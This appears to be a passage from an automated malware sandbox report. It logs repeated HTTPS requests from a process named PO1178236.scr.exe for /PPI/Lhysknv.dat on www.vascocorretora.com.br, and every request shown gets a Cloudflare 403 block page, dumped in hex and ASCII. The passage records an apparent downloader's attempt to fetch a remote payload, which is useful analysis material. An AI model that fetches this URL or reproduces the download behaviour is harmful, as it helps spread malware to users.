        Expires: Thu, 09 Jan 2025 07:37:09 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IHUzI0nOvh8aEGFv63W%2Bl96pRpgfr4E%2Btqu6%2BlIUdvsc1m1gQmS2va%2BtIOvcrKdfGCVMtXxfW2oaK1XAIJzJ8iHhyGLfMo7lJ32e8BRcgH5D%2FOWB8g5S4y70Ok3c4VxAJl4PtvREnitkzzDE"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c24af9098c75-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1993&rtt_var=754&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1444829&cwnd=195&unsent_bytes=0&cid=47880fbf31e4535b&ts=128&x=0"
        2025-01-09 07:36:54 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:54 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:54 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:54 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 34 61 66 39 30 39 38 63 37 35 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c24af9098c75</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:54 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 34 61 66 39 30 39 38 63 37 35 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c24af9098c75',t:'MTczNjQwODIxNC4wMDAwMDA='};v
        2025-01-09 07:36:54 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        94192.168.2.949803188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:54 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:54 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:54 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:09 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXvfgXfpodtdikqQuRYBe7lqLzDZpz%2BAPj6yR0k%2B%2B8quLFSq1Rx2%2FPWyL39QKwI8Ywtq189VNOCuAUMuxvom3tIO8dKx0Dfc0r0SCbZm4Ottet18V7rSpYUqh1nNAQfm8MudxGdLO171pWWA"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c24ecca44257-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2528&min_rtt=2507&rtt_var=983&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1090365&cwnd=215&unsent_bytes=0&cid=e9503e8d2e3875f6&ts=155&x=0"
        2025-01-09 07:36:54 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:54 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:54 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:54 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 34 65 63 63 61 34 34 32 35 37 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c24ecca44257</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:54 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 34 65 63 63 61 34 34 32 35 37 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c24ecca44257',t:'MTczNjQwODIxNC4wMDAwMDA='};var
        2025-01-09 07:36:54 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        95192.168.2.949804188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:55 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:55 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:55 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:10 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oxVmSQoyDeRAm0HRF2pDCr2xlJrEUArGd8daTGTya%2FrysZphGYhKPiWpa6KzqUjJnh9u2y4o5B9%2BagBok0mo%2BbMjVo2qUNIrnM3lJBLnJVWHV%2BxUTsUk4H6y7lJgQKo2KR1oaya0GgYjlIxD"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2528d257cf6-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1956&min_rtt=1954&rtt_var=738&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1476985&cwnd=193&unsent_bytes=0&cid=23658d5d79171b01&ts=146&x=0"
        2025-01-09 07:36:55 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:55 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:55 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:55 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 35 32 38 64 32 35 37 63 66 36 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2528d257cf6</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:55 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 35 32 38 64 32 35 37 63 66 36 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 78 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2528d257cf6',t:'MTczNjQwODIxNS4wMDAwMDA='};var
        2025-01-09 07:36:55 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        96192.168.2.949805188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:55 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:56 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:56 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:11 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJxdSU9eA7ZQNHRTEccxJJt22mVhSRG%2FJYB9skKxEakL%2FfPXZLkvn9GK2wmF8r%2B6cvHif%2F2Xl%2BHvN1fvmxbJQCbi8M3PtkkzEcL9TkomU8CO0cpx8rMV6lw465I1DX81w0Wn%2FZ7ofBLGKhuK"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2564f99de96-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1599&rtt_var=609&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1784841&cwnd=224&unsent_bytes=0&cid=dc00f30f93d6185f&ts=139&x=0"
        2025-01-09 07:36:56 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
